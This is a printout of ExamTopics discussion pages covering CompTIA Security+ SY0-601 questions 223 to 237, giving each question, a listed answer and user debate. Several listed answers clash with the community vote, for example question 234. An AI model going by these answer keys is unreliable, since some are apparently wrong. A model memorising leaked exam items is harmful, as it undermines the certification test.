Selected Answer: C
As I´m from europe i might be a little bit biased on this one, but I know for sure that data controller and data processor are fix terms used in
GDPR.
Data Controller – Is a legal or natural person, an agency, a public authority, or any other body who, alone or when joined with others, determines
the purposes of any personal data and the means of processing it.

Data Processor – Is a legal or a natural person, agency, public authority, or any other body who processes personal data on behalf of a data
controller.

I don´t know to much about SSAE so maybe it happens to be that they use exactly the same wording here, but I´ll go with GDPR on this one.
upvoted 2 times

  J_Ark1 2 months, 3 weeks ago


Selected Answer: A
dare to go for it
upvoted 1 times

  JohnMangley 3 months, 2 weeks ago


Selected Answer: C
C.

https://kirkpatrickprice.com/video/gdpr-fundamentals-roles-under-the-law-controllers-processors-and-joint-controllers/
upvoted 2 times

  adodoccletus 3 months, 2 weeks ago


A is the correct answer
upvoted 1 times

  NXPERT 3 months, 2 weeks ago


Answering A
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Selected Answer: A
What snofear said
upvoted 1 times

  CertAddict69 3 months, 3 weeks ago


I think this is C as the GDPR applies to these groups.
upvoted 2 times

  Ha9ate 3 months, 4 weeks ago


Selected Answer: C
C correct
upvoted 2 times

  snofear 4 months ago


Selected Answer: A
Statement on Standards for Attestation Engagements.This AICPA-developed auditing report assesses how well organizations handle data
security, system privacy, data confidentiality and data processing processes.
upvoted 3 times

  andrizo 3 months, 3 weeks ago


I agree
upvoted 2 times

  serginljr 4 months ago


Selected Answer: C
C correct
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 389/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #223 Topic 1

Which of the following is MOST likely to contain ranked and ordered information on the likelihood and potential impact of catastrophic events that
may affect business processes and systems, while also highlighting the residual risks that need to be managed after mitigating controls have
been implemented?

A. An RTO report

B. A risk register

C. A business impact analysis

D. An asset value register

E. A disaster recovery plan

Correct Answer: C

Community vote distribution


B (85%) Other

  J_Ark1 Highly Voted  2 months, 3 weeks ago


Selected Answer: B
I some how miss stoneface lol but i shall carry his logic, "Key Words peeps"
upvoted 8 times

  serginljr Highly Voted  4 months ago


In the old test the answer was B.

https://www.examtopics.com/discussions/comptia/view/74664-exam-sy0-601-topic-1-question-316-discussion/
upvoted 6 times

  nicekoda Most Recent  1 month, 1 week ago


The answer is Risk Register. To start with, Business impact analysis is a systematic process while Risk Rigeister is a DOCUMENT that contains
everything described in the question
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: B
I´d go with risk matrix, but guess what...CompTIA does not have that answer -.- So the risk register is the next best thing to use.
upvoted 1 times

  Imok 3 months ago


Selected Answer: B
Risk Register
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: D
on the spot
upvoted 1 times

  zharis 3 months, 1 week ago


my bad. C is on the spot not D
upvoted 1 times

  ostralo 3 months, 2 weeks ago


Risk assessments analyze potential threats and their likelihood of happening, a business impact analysis explains the effects of particular
disasters and their severity.
upvoted 1 times

  p610878 3 months, 3 weeks ago


Selected Answer: C
Business impact analysis (BIA) is the process of performing risk assessment on
business tasks and processes rather than on assets. The purpose of BIA is to determine the
risks to business processes, set criticality prioritization, and begin the design protective and recovery solutions.
upvoted 2 times

  passmemo 3 months, 3 weeks ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 390/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: B
A risk register is a document that records all of your organisation's identified risks, the likelihood and consequences of a risk occurring, the
actions you are taking to reduce those risks and who is responsible for managing them
upvoted 3 times

  DYKO 4 months ago


Selected Answer: B
The risk register is the primary tool that risk management professionals use to track risks facing the organization.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 391/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #224 Topic 1

A worldwide manufacturing company has been experiencing email account compromises. In one incident, a user logged in from the corporate
office in France, but then seconds later, the same user account attempted a login from Brazil. Which of the following account policies would BEST
prevent this type of attack?

A. Network location

B. Impossible travel time

C. Geolocation

D. Geofencing

Correct Answer: B

Community vote distribution


B (88%) 13%

  comeragh Highly Voted  4 months ago


Selected Answer: B
Agree with B here
upvoted 5 times

  Gino_Slim Most Recent  3 months, 1 week ago


Selected Answer: B
I would normally have selected Geolocation. However, the question was adamant on mentioned the distance and time between logins.

Geolocation, would stop you from logging in outside of a different area entirely.
While in this case, it seems that the issue is the amount of time that occurred between logins between places.

We have to look at the inner workings of the question itself. Because geolocation would work if it they only wanted users to login while in France.

It may not sound like it but "impossible travel time" is actually a policy type thing.
upvoted 1 times

  Skelter117 3 months, 3 weeks ago


Selected Answer: B
I vote impossible travel time. It states it is a worldwide company so you cannot set up a geofencing perimeter. However you could have
impossible travel time alerts.
upvoted 4 times

  nicekoda 1 month, 1 week ago


Smart analysis
upvoted 1 times

  pgonza 2 months, 2 weeks ago


Thanks for highlighting the key word "Worldwide". The other key word is "Seconds"
upvoted 1 times

  Ha9ate 3 months, 4 weeks ago


Selected Answer: B
B correct
upvoted 2 times

  [Removed] 3 months, 4 weeks ago


Selected Answer: D
Is this not Geofencing?
upvoted 2 times

  pgonza 2 months, 2 weeks ago


The company is said to be worldwide, so you can't geofence. Correct answer is B.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Thats only on premise
upvoted 1 times

  serginljr 4 months ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 392/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: B
B correct
upvoted 2 times

Question #225 Topic 1

A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no patches are currently available to resolve the
issue. The security administrator is concerned that servers in the company’s DMZ will be vulnerable to external attack; however, the administrator
cannot disable the service on the servers, as SMB is used by a number of internal systems and applications on the LAN. Which of the following
TCP ports should be blocked for all external inbound connections to the DMZ as a workaround to protect the servers? (Choose two.)

A. 135

B. 139

C. 143

D. 161

E. 443

F. 445

Correct Answer: BF

Community vote distribution


BF (100%)

  Ha9ate Highly Voted  4 months ago


Selected Answer: BF

SMB use TCP Port 139 445 UDP Port 137 138
upvoted 6 times

  ronniehaang Most Recent  4 days ago


Selected Answer: BF
The security administrator should block TCP ports 445 and 139 for all external inbound connections to the DMZ as a workaround to protect the
servers from the SMB protocol vulnerability. These ports are commonly used by SMB for communication. Blocking these ports for external
inbound connections can prevent external attackers from exploiting the vulnerability, while still allowing the internal systems and applications to
use SMB for communication.
upvoted 1 times

  serginljr 4 months ago


Selected Answer: BF
BF correct
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 393/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #226 Topic 1

A recent phishing campaign resulted in several compromised user accounts. The security incident response team has been tasked with reducing
the manual labor of filtering through all the phishing emails as they arrive and blocking the sender’s email address, along with other time-
consuming mitigation actions. Which of the following can be configured to streamline those tasks?

A. SOAR playbook

B. MDM policy

C. Firewall rules

D. URL filter

E. SIEM data collection

Correct Answer: A

Community vote distribution


A (100%)

  Kashim Highly Voted  4 months ago


Selected Answer: A
Automation = SOAR playbook
upvoted 6 times

  carpathia Most Recent  2 months, 3 weeks ago


Selected Answer: A
https://securityboulevard.com/2021/02/your-first-soar-use-case-phishing-triage/
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: SOAR playbook

SOAR playbooks are used to automate key functions of a SOC based on processes documented in the incident response playbooks.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 394/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #227 Topic 1

A user reports constant lag and performance issues with the wireless network when working at a local coffee shop. A security analyst walks the
user through an installation of Wireshark and gets a five-minute pcap to analyze. The analyst observes the following output:

Which of the following attacks does the analyst MOST likely see in this packet capture?

A. Session replay

B. Evil twin

C. Bluejacking

D. ARP poisoning

Correct Answer: A

Community vote distribution


B (75%) A (25%)

  [Removed] Highly Voted  3 months, 3 weeks ago


Selected Answer: B
coffee shop = public wifi,

a deauthentication attack to the target client, disconnecting it from its current network, thus allowing the client to automatically connect to the
evil twin access point.
upvoted 9 times

  JSOG Most Recent  2 months ago


Selected Answer: B
Deauthentication
Description
This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients
can be done for a number of reasons:

Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.
Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)
Of course, this attack is totally useless if there are no associated wireless client or on fake authentications.
upvoted 1 times

  ankit_1606 3 months ago


Selected Answer: B
https://surfshark.com/blog/what-is-evil-twin-attack
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: A
I don't think it's Evil Twin because it doesn't state anything about "two wifi SSIDs with the same name". It just says they are at a coffee shop.

What it does state however is that there is lag and etc...which a Session Replay does.

Session replay attacks, also known as replay or replay attacks, are network attacks that maliciously “retry” or “delay” valid data transmissions.
Hackers can do this by intercepting the session and stealing the user’s unique session ID (stored as either a cookie, URL, or form field). The
hacker can now impersonate the authorized user and have full access to do everything the authorized user can do on the website.

A replay attack occurs when a cybercriminal intercepts a secure network communication, intercepts it, and fraudulently delays or transmits it to
trick the recipient into doing what the attacker is looking for.
upvoted 4 times

  Sandon 1 week, 2 days ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 395/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

You missed the keyword "deauthentication"


upvoted 1 times

  yasuke 2 months, 3 weeks ago


IEEE 802.11 refers to the set of standards that define communication for wireless LANs (wireless local area networks, or WLANs). The
technology behind 802.11 is branded to consumers as Wi-Fi.
upvoted 1 times

  comeragh 3 months, 3 weeks ago


Selected Answer: B
Agreed with B - Evil Twin here.
upvoted 3 times

  Kashim 3 months, 3 weeks ago


Selected Answer: A
Only session reply makes sense to me. Evil twin is copy of legimitate SSID (access point). No deauthentication is needed here.
upvoted 2 times

  Skelter117 3 months, 3 weeks ago


I’m almost positive you have to deauth to get them to connect to the evil twin. I do not believe session replay has a deauth needed.
Thoughts?
upvoted 3 times

  Sandon 1 week, 2 days ago


You're exactly right, it's an evil twin
upvoted 1 times

  ksave 3 months, 3 weeks ago


Selected Answer: B
Deauthentication: Seems Evil Twin to me
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 396/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #228 Topic 1

A security analyst is reviewing the following output from a system:

Which of the following is MOST likely being observed?

A. ARP poisoning

B. Man in the middle

C. Denial of service

D. DNS poisoning

Correct Answer: C

Community vote distribution


C (100%)

  jspecht 3 months, 1 week ago


Selected Answer: C
Once you realize the destination IP and port are on the left the answer is easier to understand. Multiple source ports trying to connect to the
same destination IP and port means DOS.
upvoted 4 times

  Inimitable 4 weeks, 1 day ago


I agree with the answer C, but the source IP are on the left and the Destination are on the right.

It's a SYN flood attack also known has a half-open attack. The ports of the server are in TIME_WAIT status because someone has started a
three-hand-shake connection on each ports and the ports are now waiting for an acknowledge. Unfortunately, the ports will never get this
acknowledge, because the attacker want these ports be keeping in waiting status to not be able to respond to any other task.
upvoted 1 times

  Skelter117 3 months, 3 weeks ago


Selected Answer: C
Dos. One source. one destination. Sending to each port.
upvoted 3 times

  serginljr 3 months, 3 weeks ago


Selected Answer: C
C correct
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 397/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #229 Topic 1

Which of the following concepts BEST describes tracking and documenting changes to software and managing access to files and systems?

A. Version control

B. Continuous monitoring

C. Stored procedures

D. Automation

Correct Answer: A

Community vote distribution


A (100%)

  passmemo Highly Voted  3 months, 3 weeks ago


Selected Answer: A
Version control, also known as source control, is the process of tracking and managing changes to files over time
upvoted 5 times

  Sir_Learnalot Most Recent  2 months, 3 weeks ago


Selected Answer: A
Git is your friend
upvoted 1 times

  Kashim 3 months, 3 weeks ago


Selected Answer: A
A correct
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 398/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #230 Topic 1

A penetration tester is brought on site to conduct a full attack simulation at a hospital. The penetration tester notices a WAP that is hanging from
the drop ceiling by its cabling and is reachable. Which of the following recommendations would the penetration tester MOST likely make given this
observation?

A. Employ a general contractor to replace the drop-ceiling tiles.

B. Place the network cabling inside a secure conduit.

C. Secure the access point and cabling inside the drop ceiling.

D. Utilize only access points that have internal antennas

Correct Answer: C

Community vote distribution


C (100%)

  carpathia 2 months, 3 weeks ago


I thought APs are not meant to have physical object "in front" of them cause of signal reduction. Sitting behind tiles would not be a good idea.
But then the other options are not very convincing either.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: C
Don't over think this one. It's honestly just to make sure the access point is back in place and not readily reachable.
upvoted 3 times

  Kashim 3 months, 3 weeks ago


Selected Answer: C
I think C is the best option here.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 399/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #231 Topic 1

Which of the following techniques eliminates the use of rainbow tables for password cracking?

A. Hashing

B. Tokenization

C. Asymmetric encryption

D. Salting

Correct Answer: D

Community vote distribution


D (100%)

  theglass Highly Voted  3 months, 4 weeks ago


Selected Answer: D
Per prof. Messer's notes: "Rainbow tables won’t work with salted hashes"
upvoted 8 times

  FMMIR Most Recent  2 months, 1 week ago


Selected Answer: D
Defense against Rainbow Table Attacks Rainbow table attacks can easily be prevented by using salt techniques, which is a random data that is
passed into the hash function along with the plain text. This ensures that every password has a unique generated hash and hence, rainbow table
attack, which works on the principle that more than one text can have the same hash value, is prevented.
upvoted 1 times

  NXPERT 3 months, 2 weeks ago


D = using salt techniques. you can find it on the internet.
upvoted 1 times

  chipdomcobb 3 months, 4 weeks ago


Selected Answer: D
I don't know if it eliminates the problem, but I'm going with salting.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 400/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #232 Topic 1

During a security assessment, a security analyst finds a file with overly permissive permissions. Which of the following tools will allow the analyst
to reduce the permissions for the existing users and groups and remove the set-user-ID bit from the file?

A. ls

B. chflags

C. chmod

D. lsof

E. setuid

Correct Answer: C

Community vote distribution


C (100%)

  passmemo Highly Voted  3 months, 3 weeks ago


Selected Answer: C
Chmod removes the setuido permission, that is, it removes the S bit. Setuido is the specific permission, but it is removed with Chmod.
https://www.cbtnuggets.com/blog/technology/system-admin/linux-file-permissions-understanding-setuid-setgid-and-the-sticky-bit
upvoted 6 times

  passmemo 3 months, 3 weeks ago


The chmod (short for change mode) command is used to manage file system access permissions on Unix and Unix-like systems.
upvoted 3 times

  Knowledge33 Most Recent  3 months ago


Selected Answer: C
Chmod is the Linux command used to change access permissions of a file. The general form of the command is
chmod <options> <permissions> <filename>
upvoted 1 times

  chipdomcobb 3 months, 4 weeks ago


The setuid part threw me, but from what I read at the link below, it appears this action can be done with chmod, so I'm going with C.

https://serverfault.com/questions/238962/how-do-i-clear-the-s-permission-on-a-directory-in-linux
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 401/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #233 Topic 1

A network administrator is concerned about users being exposed to malicious content when accessing company cloud applications. The
administrator wants to be able to block access to sites based on the AUP. The users must also be protected because many of them work from
home or at remote locations, providing on-site customer support. Which of the following should the administrator employ to meet these criteria?

A. Implement NAC.

B. Implement an SWG.

C. Implement a URL filter.

D. Implement an MDM.

Correct Answer: B

Community vote distribution


B (90%) 5%

  Kashim Highly Voted  3 months, 3 weeks ago


Selected Answer: B
"A secure web gateway (SWG) protects users from web-based threats in addition to applying and enforcing corporate acceptable use policies."
upvoted 9 times

  comeragh Highly Voted  3 months, 3 weeks ago


Selected Answer: B
Agree with B here. Don't agree with NAC.
upvoted 5 times

  ronniehaang Most Recent  4 days ago


Selected Answer: B
The best solution for the network administrator to implement to meet the criteria of blocking access to sites based on the AUP and protecting
users from malicious content is an SWG (Secure Web Gateway). An SWG provides a centralized solution for monitoring and controlling internet
usage on the network. It inspects all web traffic, scans for malicious content and implements policies to block access to websites that violate the
organization's AUP (Acceptable Use Policy). Additionally, an SWG can provide protection to users when they are accessing cloud applications
from remote locations.
upvoted 1 times

  FMMIR 2 months, 1 week ago


Selected Answer: D
An SWG plays a crucial role in traffic inspection as it analyzes all the web traffic passing through to and from the organization. It blocks content
that does not conform to corporate policies, such as denying entry to unencrypted content from any site. These inspection policies can also be
customized for better organizational implementation.
upvoted 1 times

  FMMIR 2 months, 1 week ago


ANS: B
upvoted 2 times

  carpathia 2 months, 3 weeks ago


Selected Answer: B
https://internet2-0.com/the-difference-between-a-secure-web-gateway-and-a-firewall/

Firewalls inspect data packets


Secure web gateways inspect applications
Secure web gateways set and enforce rules for users

Software as a Service (SaaS) applications


Remote networking
Cloud-based computing
upvoted 3 times

  NXPERT 3 months, 2 weeks ago


Answer is B, NAC is something else, it is associated with 802.1x, which is basically local MFA.
upvoted 2 times

  andrizo 3 months, 3 weeks ago


Not url, because apps
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 402/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  passmemo 3 months, 3 weeks ago


Selected Answer: A
NAC= Network Access Control
upvoted 1 times

Question #234 Topic 1

A website developer is working on a new e-commerce website and has asked an information security expert for the most appropriate way to store
credit card numbers to create an easy reordering process. Which of the following methods would BEST accomplish this goal?

A. Salting the magnetic strip information

B. Encrypting the credit card information in transit

C. Hashing the credit card numbers upon entry

D. Tokenizing the credit cards in the database

Correct Answer: B

Community vote distribution


D (100%)

  nyeah Highly Voted  3 months, 4 weeks ago


Selected Answer: D
Shouldn't the answer be D?
upvoted 7 times

  pdbone Highly Voted  3 months, 4 weeks ago


redit card tokenization is the process of de-identifying sensitive cardholder data by converting it to a string of randomly generated numbers
called a "token." Similar to encryption, tokenization obfuscates the original data to render it unreadable in the event of a data breach or other
exposure.
upvoted 5 times

  Gino_Slim Most Recent  3 months, 1 week ago


Selected Answer: D
To help those who may need to see it in another way

A: It's "e-commerce" so the stripe of the card has no relevance here


B: In transit doesn't work because we are looking at stored information
C: Hashing will always SOUND good but that isn't applicable either. So this won't be it either.
upvoted 4 times

  J_Ark1 2 months, 3 weeks ago


why not c plz explain
upvoted 1 times

  Sandon 1 week, 2 days ago


Hashing is one-way
upvoted 1 times

  JStevie 2 months, 2 weeks ago


they ask for easy reordering = tokenization
upvoted 2 times

  usertest456 3 months, 3 weeks ago


Selected Answer: D
answer should be D
upvoted 3 times

  Kashim 3 months, 4 weeks ago


Selected Answer: D
https://youtu.be/bCknf8goMH0?t=90
D. Tokenization
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 403/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #235 Topic 1

Which of the following supplies non-repudiation during a forensics investigation?

A. Dumping volatile memory contents first

B. Duplicating a drive with dd

C. Using a SHA-2 signature of a drive image

D. Logging everyone in contact with evidence

E. Encrypting sensitive data

Correct Answer: C

Community vote distribution


C (62%) D (38%)

  atrax Highly Voted  3 months, 2 weeks ago


Selected Answer: C
Yeah, it’s C. Nonrepudiation is specifically talking about the proof that someone has done something on the system. Taking a hash of the original
disk is proof that it represents the state of the data when the investigation began. It’s not a signature in the sense of an encryption cert or
something like that, but it is definitely a method of ensuring that the data on the drive represents the user’s changes, vice those of the
investigator or someone else after the fact. Chain of custody doesn’t apply because nonrepudiation is talking about the data itself.
upvoted 9 times

  RawToast Highly Voted  3 months ago


Selected Answer: D
I would go with D. logging everyone in contact. While a hash function like C. would grant integrity, it only partially grants non-repudiation. The
goal of non-repudiation measures is to ensure that no one can alter a claim previously made (example: digital signature proving someone sent
data. They cannot deny that they sent the data because their digital signature was on the transmission.) In this case, answer D. grants non-
repudiation because the logs of everyone in contact are proof of that interaction and cannot be refuted after the fact. C would only prove data
was not altered.
upvoted 7 times

  Sandon 1 week, 2 days ago


That ain't it buddy
upvoted 2 times

  hanmai Most Recent  3 days, 20 hours ago


Nonrepudiation provides proof of the origin, authenticity and integrity of data. It provides assurance to the sender that its message was delivered,
as well as proof of the sender's identity to the recipient.
upvoted 1 times

  ronniehaang 6 days, 2 hours ago


Selected Answer: D
Chain of Custody supports non-repudiation.
SHA-2 only supports data integrity
upvoted 2 times

  nicekoda 1 month, 1 week ago


The answer is C. A common method to secure data and maintain authenticity is hashing. This can be used to maintain the authenticity of an
evidence in a forensic investigation
upvoted 1 times

  Jimbobilly 1 month, 4 weeks ago


Selected Answer: C
It is C. A Hash will confirm the data was not altered. Simple as that.
upvoted 4 times

  Nome02 2 months ago


C is correct. Practically D is not even possible all the times.
upvoted 3 times

  itsmorphintime 2 months, 1 week ago


Selected Answer: C
Think about the end goal, we need to make sure the owner of the drive was the only one who was making changes to data. After the drive is in
our hands it doesnt matter anymore, we can prove that nobody else has made changes while the drive is in our hands.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 404/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  okay123 2 months, 2 weeks ago


Selected Answer: C
Digital signatures provide authenticity protection, integrity protection, and non-repudiation, but not confidentiality protection. The result of a
cryptographic transformation of data that, when properly implemented, provides origin authentication, assurance of data integrity and signatory
non-repudiation.

-
https://csrc.nist.gov/glossary/term/digital_signature#:~:text=Digital%20signatures%20provide%20authenticity%20protection,repudiation%2C%
20but%20not%20confidentiality%20protection.&text=800%2D63%2D3-,The%20result%20of%20a%20cryptographic%20transformation%20of
%20data%20that%2C%20when,integrity%20and%20signatory%20non%2Drepudiation.

Thus, i am going with C


upvoted 3 times

  carpathia 2 months, 3 weeks ago


Proabably the SHA SIgnature thingy. Has anyone ever heard of a SHA SIGNATURE? I haven't. I thought it was a digest. Very confusing to use this
combo especially in this sort of exam environment. A signature provides non-repudiation. SHA doesn't. He he.
upvoted 1 times

  ksave 2 months, 4 weeks ago


Selected Answer: C
Non-repudiation involves hashing. So, going with C
upvoted 3 times

  ahmedhablas 3 months ago


Selected Answer: D
Non-repudiation doesn't equal to integrity
Non-repudiation is about having evidence that the subject actually did an action and that is achieved by keeping logs
upvoted 4 times

  Sandon 1 week, 2 days ago


Not even close
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: C
Non-repudiation is achieved through cryptography, like digital signatures, and includes other services for authentication, auditing and logging.
Which is what the question is asking for with that. If they sated change of command of chain of custody then it would be D
upvoted 4 times

  jacobtwotwo 3 months, 3 weeks ago


Can someone explain why it's D?
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


I can't. Because it's asking for non-repudiation which is achieved through cryptography, like digital signatures, and includes other services for
authentication, auditing and logging
upvoted 1 times

  Skelter117 3 months, 3 weeks ago


only ones that make sense to me are c and d
upvoted 2 times

  CertAddict69 3 months, 3 weeks ago


Selected Answer: D
I'm going with D.
upvoted 3 times

  Dachosenone 3 months, 3 weeks ago


It cannot be SHA-2, hashing can only do integrity.
upvoted 2 times

  [Removed] 3 months, 3 weeks ago


Integrity is what the question is asking for. Non-repudiation
upvoted 9 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 405/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #236 Topic 1

A security analyst is tasked with classifying data to be stored on company servers. Which of the following should be classified as proprietary?

A. Customers’ dates of birth

B. Customers’ email addresses

C. Marketing strategies

D. Employee salaries

Correct Answer: C

Community vote distribution


C (100%)

  passmemo Highly Voted  3 months, 3 weeks ago


Selected Answer: C
Proprietary Information” shall mean information (whether now existing or hereafter created or acquired) developed, created, or discovered by the
Company, or which became known by, or was conveyed to the Company, which has commercial value in the Company's business.
upvoted 6 times

  Dachosenone 3 months, 4 weeks ago


Highly Voted 
You cannot own people's information, so the only thing left is marketing strategies
upvoted 6 times

  MarciaL 3 months, 2 weeks ago


Most Recent 
B. Customers email addresses
upvoted 1 times

  NXPERT 3 months, 2 weeks ago


Possibly C, as first two are PII.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 406/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #237 Topic 1

Which of the following holds staff accountable while escorting unauthorized personnel?

A. Locks

B. Badges

C. Cameras

D. Visitor logs

Correct Answer: C

Community vote distribution


D (53%) B (28%) C (19%)

  [Removed] Highly Voted  3 months, 3 weeks ago


I feel like cameras are more accountable than a logbook.
upvoted 11 times

  FMMIR Highly Voted  1 month, 3 weeks ago


Selected Answer: D
Be careful with this one!

Visitor logs hold staff accountable while escorting unauthorized personnel. A visitor log is a record of individuals who enter a facility, and it
typically includes details such as the date and time of the visit, the name of the visitor, and the name of the staff member who escorted them. By
maintaining a visitor log, it is possible to track who has entered the facility and who was responsible for escorting them. This can help to hold
staff accountable for escorting unauthorized personnel and ensure that they are following security protocols and procedures. Locks, badges, and
cameras are all important security measures, but they are not directly related to holding staff accountable for escorting unauthorized personnel.
upvoted 9 times

  zf1343 2 weeks, 6 days ago


A "visitor" doesn't quite fit well within "unauthorized personnel" term. The person needing escort most likely has already been issued a badge
to be at work.
upvoted 1 times

  ronniehaang Most Recent  4 days ago


Selected Answer: D
D. Visitor logs holds staff accountable while escorting unauthorized personnel. A visitor log is a document used to record details of visitors who
enter an organization or site. It helps in monitoring who has entered the organization, when, and for what purpose. In the context of escorting
unauthorized personnel, visitor logs can help hold staff accountable by providing evidence of who was present during the escort, the time of the
escort, and any other relevant details. This information can be useful in case of any security breach or violation of security policies, and can help
in conducting an investigation and determining the responsible parties.
upvoted 1 times

  Sandon 1 week, 2 days ago


Selected Answer: C
According to ChatGPT

Cameras can hold staff accountable while escorting unauthorized personnel. The presence of cameras can act as a deterrent for staff to engage
in any misconduct, and in case of any incidents, the footage can be used as evidence to hold the staff accountable for their actions. Cameras
can provide real-time monitoring, and recorded footage can be used to review the actions of the staff and the unauthorized personnel, which can
help to identify any security breaches and hold the responsible parties accountable.

Locks, Badges and Visitor logs are security measures that can help in controlling access to a facility, but they do not hold staff accountable while
escorting unauthorized personnel.
Locks can secure a facility, but they can't record staff action.
Badges are used to identify authorized personnel, but they don't record staff action.
Visitor logs are used to track visitors, but they don't record staff action.
upvoted 1 times

  sanlibo 1 week, 2 days ago


Why ChatGPT? use Comptia office guide.
upvoted 2 times

  Ranaer 4 days ago


Because he is completely incompetent and can either post ChatGPT answers or say "that aint it buddy" to everyone who disagrees with
him on a question.
No actual attempt at reasoning or explanation, just acting smug.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 407/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Nirmalabhi 1 week, 4 days ago


this is one fucked up Q. seriously
upvoted 3 times

  sanlibo 2 weeks ago


Selected Answer: B
ID badge showing name and (perhaps) access details is one of the
cornerstones of building security. Anyone moving through secure areas of a building
should be wearing an ID badge; anyone without an ID badge should be challenged.
Color-coding could be used to make it obvious to which zones a badge is granted
access.

Lesson 21: Explaining Physical Security | Topic 21A


upvoted 1 times

  diegomatheus00 2 weeks, 1 day ago


Selected Answer: C
Creio que C seja a resposta correta.
upvoted 1 times

  nicekoda 1 month, 1 week ago


The answer is C. The emphasis is ..... while escorting unauthorized personnel. A visitor log must be filled before escorting the unauthorized
personnel. In this case, it is the camera that captures who was doing the escorting.
upvoted 1 times

  okay123 1 month, 3 weeks ago


Selected Answer: B
"Which of the following holds staff accountable while escorting unauthorized personnel?"

Obviously, if a security guard is escorting someone off the premises, they have some authority of some kind to do that. An identifable badge. You
can use a cop for example, tomato tomanto you get my point!
upvoted 1 times

  Jimbobilly 1 month, 4 weeks ago


Selected Answer: C
I'm going with C as well. To hold someone accountable you need proof they did something. Cameras don't lie.
upvoted 2 times

  Reese20_14 2 months, 2 weeks ago


I wanted to pick Cameras on this one, but after looking into it, the Badges answer makes sense. Why? Because anyone who is holding a Badge
that authorizes them as an escort will be held accountable if the individual they are escorting compromises security.

Sure, a camera is going to record whatever happens, but it's not going to hold anyone acountable.
upvoted 1 times

  babyzilla 2 months, 2 weeks ago


Selected Answer: B
There are no cameras where I work. Locks wouldn't make sense. That leaves logs and badges. Logs can easily be manipulated. Badges can help
with non-repudiation too.
upvoted 2 times

  kstevens11 2 months, 4 weeks ago


Selected Answer: C
I took "while escorting" as the keywords, and cameras are deterrent at least (CCTV) and can hold you accountable if they are recording, as well.
How do badges hold you accountable? I'm probably missing the point there.
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: B
I going with badges. No badge, no access. A camera isn't holding you accountable because only security personnel can see that. And, at the
time of escorting you aren't looking at cameras as a regular employee.
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


It is definitely NOT a logbook. Electronic or not. I can lie about my name easily.
upvoted 1 times

  Picvet 3 months, 1 week ago


I've never seen a visitors log that gives you an option to write the name of the person escorting you. Just saying.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Selected Answer: D
Badges only keep visitors accountable. A log will tell you who's the assigned escort
